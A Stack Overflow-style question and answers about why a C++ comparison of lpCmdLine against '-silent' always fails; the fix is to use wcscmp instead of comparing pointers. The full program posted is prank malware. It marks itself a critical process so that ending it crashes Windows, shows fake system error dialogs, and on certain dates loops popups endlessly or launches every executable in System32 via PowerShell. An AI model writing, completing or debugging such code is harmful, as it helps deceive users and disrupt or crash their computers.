# lpCmdLine not comparing with string

Tags: c++

My code is supposed to produce a fake error message except for when opened with "-silent" as a command line option but for some reason it's producing the fake message no matter what, however when I debug this (I have some code commented out for it that you can try) it shows that lpCmdLine is returning "-silent" but when compared in the if not statement it always comes out as true no matter what. Here's the full code:

```
#include "stdafx.h"
#include "Win32InsaneMain.h"
#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <io.h>
#include <fcntl.h>
#include <ctime>

#pragma comment(lib,"ntdll.lib")

EXTERN_C NTSTATUS NTAPI RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
EXTERN_C NTSTATUS NTAPI NtSetInformationProcess(HANDLE, ULONG, PVOID, ULONG);

#define MAX_LOADSTRING 100

// GloQbal Variables:
HINSTANCE hInst;                                // current instance
WCHAR szTitle[MAX_LOADSTRING];                  // The title bar text
WCHAR szWindowClass[MAX_LOADSTRING];            // the main window class name
BOOLEAN bl;
ULONG BreakOnTermination;
NTSTATUS status;
HANDLE h = GetCurrentProcess();
ULONG ProcessInSession = 1;
int debug = 0;

int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
    _In_opt_ HINSTANCE hPrevInstance,
    _In_ LPWSTR    lpCmdLine,
    _In_ int       nCmdShow)
{

    RtlAdjustPrivilege(20, TRUE, FALSE, &bl);

    BreakOnTermination = 1;

    status = NtSetInformationProcess(h, 0x1d, &BreakOnTermination, sizeof(ULONG));

    //MessageBox(0, lpCmdLine, TEXT("Debug"), MB_OK | MB_SETFOREGROUND | MB_TASKMODAL | MB_ICONERROR | MB_SYSTEMMODAL);    //Uncomment for debugging

    if (lpCmdLine != TEXT("-silent")) {
        MessageBox(0, TEXT("The instruction at 0xf7775d98 referenced memory at 0x01ff3000. The memory could not be written.\n\nClick on OK to terminate the program"), TEXT("Windows - Application Error"), MB_OK | MB_SETFOREGROUND | MB_TASKMODAL | MB_ICONERROR | MB_SYSTEMMODAL);
    }

    clock_t start = clock();
    tm* my_time;
    time_t t = time(NULL);
    my_time = localtime(&t);
    int month = my_time->tm_mon;
    int day = my_time->tm_mday;
    if (month == 9) {
        if (day == 1) {
            while (TRUE) {
                Sleep(60000);
                MessageBox(0, TEXT("Error: ID 10, Type T."), TEXT("Windows Error"), MB_OK | MB_SETFOREGROUND | MB_TASKMODAL | MB_ICONERROR | MB_SYSTEMMODAL);
            }
        }
        if (day == 2) {
            MessageBox(0, TEXT("You're not being productive enough."), TEXT("Windows Productivity Advisory"), MB_OK | MB_SETFOREGROUND | MB_TASKMODAL | MB_ICONERROR);
            MessageBox(0, TEXT("Here are some applications to help you be productive."), TEXT("Windows Productivity Advisory"), MB_OK | MB_SETFOREGROUND | MB_TASKMODAL | MB_ICONERROR);
            system("powershell.exe -Command \"foreach ($file in (Get-ChildItem -Path 'C:\\Windows\\System32\\*.exe' -Recurse -Force).FullName) { start-process $file }\" ");
        }
    }
    while (TRUE) {

    }
    return 0;
}
```

Comment: This test `lpCmdLine != TEXT("-silent")` compares pointers not the contents of the c-strings.

Answer (score 0, accepted):

`lpCmdLine` is a pointer, and `"-silent"` is also a pointer to some place in memory where this string was stored in the compile time. So if you write

```
if (lpCmdLine != TEXT("-silent")) {...}
```

this will actually compare **pointers**, not text they are pointing to.

To compare text, use

```
if (wsccmp(lpCmdLine, L"-silent") == 0)
```

Comment: Changed wsccmp to wcscmp and got rid of " == 0" because for some reason wcsmp's output already seems to be notted, and it works now. Thanks.

Comment: Since `lpCmdLine` is an `LPWSTR` and not an `LPTSTR`, you shouldn't be using `TEXT()` at all, just use `L""` instead: `wcscmp(lpCmdLine, L"-silent")`.